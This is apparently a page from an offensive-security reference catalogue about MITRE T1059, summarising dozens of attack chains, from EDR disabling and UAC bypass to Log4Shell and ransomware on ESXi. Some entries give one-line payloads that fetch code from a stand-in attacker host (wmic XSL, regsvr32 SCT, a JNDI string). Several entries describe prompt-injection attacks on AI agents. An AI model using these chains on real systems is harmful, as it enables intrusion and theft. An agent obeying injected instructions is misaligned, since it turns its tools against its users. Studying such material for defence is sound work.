Command and Scripting Interpreter
Abuse shells/interpreters (PowerShell, bash, Python).
§ Where this technique fits
T1059 is catalogued under the Execution tactic of the offensive-security kill chain. It appears in 42 approved dossiers in the registry, at step 4.1 on average.
Authoritative reference: attack.mitre.org/techniques/T1059/.
§ Dossiers chaining this technique
- step 1 / 5 · Gatekeeper bypass → unsigned binary execution
  Deliver a payload that strips the com.apple.quarantine xattr (via .dmg with no quarantine attribute or an archive format that doesn't preserve xattrs) — Gatekeeper never prompts.
- step 2 / 5 · PMKID attack → offline crack with no client interaction
  WPA2 PMKID can be extracted from a single association attempt with the AP — no client needed. hcxdumptool + hashcat -m 22000 yields the PSK if it's weak.
- step 3 / 5 · BYOVD → kernel-level disable of EDR callbacks
  From local admin, load a signed-but-vulnerable driver. Use its kernel primitive to walk the EDR's PsSetCreateProcessNotifyRoutine entries and unlink them — EDR stops receiving events while still 'running'.
- step 3 / 5 · Apache Struts S2-045 (CVE-2017-5638) → Equifax-style breach
  Crafted Content-Type header is parsed as OGNL — execute commands as the app user. The 2017 Equifax breach origin: unpatched Struts endpoint exposed to the internet.
- step 3 / 5 · EternalBlue (MS17-010) → SMBv1 wormable spread
  Unpatched Windows 7 / Server 2008 with SMBv1 enabled — pre-auth kernel RCE. Used by WannaCry / NotPetya in 2017, still found on enclave / industrial networks.
- step 3 / 4 · wmic + XSL → AppLocker / SRP bypass
  wmic os get /format:'http://attacker/x.xsl' renders the result by fetching attacker XSL. The XSL contains JScript blocks — runs in wmic's signed-binary context, bypasses allowlisting.
- step 3 / 6 · F5 BIG-IP iControl auth bypass (CVE-2022-1388) → root on LB
  Connection-header smuggle bypasses iControl REST auth, command-injection RCE as root. Load balancers see all traffic — recover TLS keys, session cookies, internal SSO config.
- step 3 / 6 · ESXiArgs — OpenSLP unauth RCE → ransomware
  Internet-facing ESXi with SLP service on TCP/427 unpatched for CVE-2021-21974. Single ROP gadget chain yields root, then a small bash script encrypts every .vmdk on local datastores.
- step 3 / 6 · FortiGate SSL-VPN pre-auth RCE → config theft
  Pre-auth heap overflow / format-string against FortiGate sslvpnd grants root on the appliance. Pull the running config, decrypt stored RADIUS / LDAP / VPN-user secrets.
- step 3 / 6 · PJL / PostScript → printer root → quiet network foothold
  PRET-style payloads against TCP/9100 give RCE on the printer's controller. The printer is a stable, EDR-free Linux box trusted by the rest of the network — perfect long-term implant.
- step 3 / 5 · polkit pwnkit (CVE-2021-4034) → instant root
  Pre-2022 pkexec has a heap-overflow exploitable with no special permissions. Compile / drop the exploit, run as low-priv user, gain root.
- step 3 / 6 · Self-hosted runner takeover → persistent CI compromise
  A public repo with self-hosted GitHub runners accepts external PRs. First malicious PR runs on the runner; the workflow drops a runner-hook that fires before every future job.
- step 3 / 5 · AlwaysInstallElevated → SYSTEM via MSI
  Both HKCU and HKLM AlwaysInstallElevated policies set to 1 — any user-installed MSI runs as SYSTEM. Drop a malicious MSI and install it.
- step 3 / 5 · UAC bypass → elevated admin on a workstation
  Standard medium-integrity admin user runs fodhelper / silentcleanup / computerdefaults auto-elevate bypass — gets a high-integrity session without a UAC prompt.
- step 4 / 5 · Squiblydoo: regsvr32 → remote SCT execution
  regsvr32.exe /s /n /u /i:http://attacker/x.sct scrobj.dll. AppLocker / SRP often allow regsvr32 because it's signed Microsoft — attacker JS runs in its context.
- step 4 / 6 · certutil + bitsadmin → AV-friendly stager chain
  Initial access dropped a tiny .bat. It uses certutil to decode a base64 blob and bitsadmin to fetch the real beacon, then schtasks for persistence. Every binary is signed Microsoft.
- step 4 / 6 · Rowhammer → bit flip → in-browser sandbox escape
  JavaScript hammers adjacent DRAM rows for tens of seconds; an unlucky-for-defender bit flip in a page-table entry hands the attacker a write primitive into another mapping. RIDL-class chain to native code.
- step 4 / 6 · Exposed UART → root shell → firmware extraction
  Open the IoT device, locate TX/RX/GND pads, attach a USB-UART, get an unauthenticated root prompt, dump firmware for offline analysis + 0-day hunting.
- step 4 / 6 · USB drop in parking lot → HID payload → C2
  Drop branded-looking USB sticks near the target site. An employee plugs one in; a Rubber-Ducky-class HID device types a PowerShell payload that connects out to attacker C2.
- step 4 / 6 · Jenkins /script Groovy console → RCE → AD
  Jenkins script console exposed unauth on the corporate intranet — Groovy 'execute()' = RCE as the Jenkins service account, often a domain user with broad agent access.
- step 4 / 5 · Service account → SYSTEM via named-pipe impersonation
  Service-context shell has SeImpersonatePrivilege. Use Potato-family tools (Juicy / Rogue / Print / God) to coerce SYSTEM to authenticate to an attacker-controlled named pipe, then impersonate the token.
- step 4 / 5 · SUID binary → root via GTFOBins
  Find an unusual SUID binary (find / nmap / vim / awk / less), check GTFOBins for the privilege-escalation primitive, spawn a root shell.
- step 4 / 5 · Dependency confusion → internal CI compromise
  Publish a public npm package with the name of a target's private internal dependency at a higher version. CI resolves the public one first and runs install scripts in privileged CI.
- step 4 / 5 · sudo NOPASSWD on a shell-spawner → root
  User has sudo NOPASSWD on a binary that can shell out (vi, less, awk, perl, python). Use the binary's escape sequence to drop into a root shell.
- step 4 / 5 · DnsAdmins membership → SYSTEM on the DC
  DnsAdmins members can load a DLL via the DNS service ServerLevelPluginDll registry value — the service runs as SYSTEM on the DC.
- step 4 / 4 · WSUS over HTTP → push code to managed clients
  Clients using an HTTP WSUS server can be MITM'd to receive an attacker-signed (but Microsoft-trusted) auxiliary update that executes arbitrary commands as SYSTEM.
- step 5 / 6 · Multi-agent confused-deputy → tool-call escalation
  User-facing agent has limited tools; back-end planning agent has powerful tools (shell, file system). Prompt injection in user input → user agent → back-end agent. The back-end runs the attacker's intent under the planner's higher trust.
- step 5 / 6 · io_uring UAF → modprobe_path overwrite → root
  Use an io_uring UAF to land arbitrary kernel write, repoint /proc/sys/kernel/modprobe to an attacker binary, then trigger a kernel auto-modprobe — runs the binary as root.
- step 5 / 6 · Process doppelgänging → spawn signed image with attacker bytes
  Use NTFS transactional file APIs to overlay an attacker image during process creation. The final mapped process differs from the on-disk file — AV sees only the legit signed image at scan time.
- step 5 / 6 · Spring4Shell (CVE-2022-22965) → JSP webshell on Tomcat
  Send a crafted POST that uses Spring's data-binding to mutate Tomcat's logging configuration — turn its access log into a JSP file written under webapps/, then request it.
- step 5 / 6 · Log4Shell (CVE-2021-44228) → RCE → lateral
  Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.
- step 5 / 5 · WebView XSS → JS bridge → native code exec
  WebView loads partially-attacker-controlled content (e.g. injected referral param) and exposes addJavascriptInterface — XSS in the page calls the bridge to run app-level code.
- step 5 / 5 · Agent goal hijack via web search
  An autonomous agent searches the web and reads tool output. Attacker SEO-poisons / posts a comment that, when fetched, contains 'NEW INSTRUCTION:' the agent obediently follows.
- step 5 / 5 · Prompt injection → tool-call shell RCE
  Coding-assistant agent has a 'run command' tool. Hidden prompt in a README inside a project triggers `rm -rf` or fetches a reverse shell when the developer asks for help.
- step 5 / 6 · Java deserialization → ysoserial → RCE
  An endpoint deserializes a Java object from user-controlled bytes. ysoserial produces a gadget chain whose readObject() reaches Runtime.exec().
- step 5 / 5 · Server-side prototype pollution → auth bypass → RCE
  Merge / clone helper on user input pollutes Object.prototype. A later code path reads `isAdmin` from a fresh object and gets true — then a child-process gadget reaches RCE.
- step 5 / 6 · MSSQL linked-server crawl → cross-host RCE
  Linked-server trust chains in MSSQL let a low-priv login execute as a higher-priv login on a remote SQL host — and pivot recursively across the estate.
- step 5 / 5 · GPO write rights → Immediate scheduled task → SYSTEM on OU
  GenericWrite on a linked GPO (or write rights to its SYSVOL folder) lets you drop a ScheduledTasks.xml that fires as SYSTEM on every machine in the OU at the next gpupdate.
- step 6 / 7 · nf_tables UAF → kernel R/W → root
  CVE-2024-1086-class nf_tables UAF reachable from a user namespace. Win the race with userfaultfd to land an attacker object in the freed slot, build a kernel R/W primitive, overwrite the current task's cred struct.
- step 6 / 6 · Compromised vendor mailbox → reply-chain phishing → client compromise
  Take over a vendor / partner mailbox via AITM phishing. Reply to an existing thread with a malicious link — trust transferred from the genuine prior conversation defeats most user training.
- step 6 / 6 · SSTI (Jinja2) → sandbox escape → RCE
  User input rendered as a Jinja2 template instead of escaped. Escape the sandbox via __class__.__mro__ to reach subprocess and execute commands.
- step 7 / 7 · SCCM site takeover via NTLM relay (Takeover-1)
  Coerce the SCCM site server to authenticate, relay to MSSQL on the site database, and grant yourself Full Administrator inside SCCM.
§ What commonly comes next
- 01 LSASS via procdump / comsvcs.dll (seen 4×) · W-LSASS-PROCDUMP · Credential Access
- 02 Unsecured Credentials (seen 3×) · T1552 · Credential Access
- 03 Valid Accounts (seen 3×) · T1078 · Initial Access
- 04 LSASS Memory (seen 2×) · T1003.001 · Credential Access
- 05 Scheduled Task Hijack (seen 2×) · W-SCHEDTASK-HIJACK · Persistence
- 06 AlwaysInstallElevated (seen 1×) · W-ALWAYS-ELEVATE · Privilege Escalation
- 07 Application Layer Protocol (seen 1×) · T1071 · Command and Control
- 08 Brute Force (seen 1×) · T1110 · Credential Access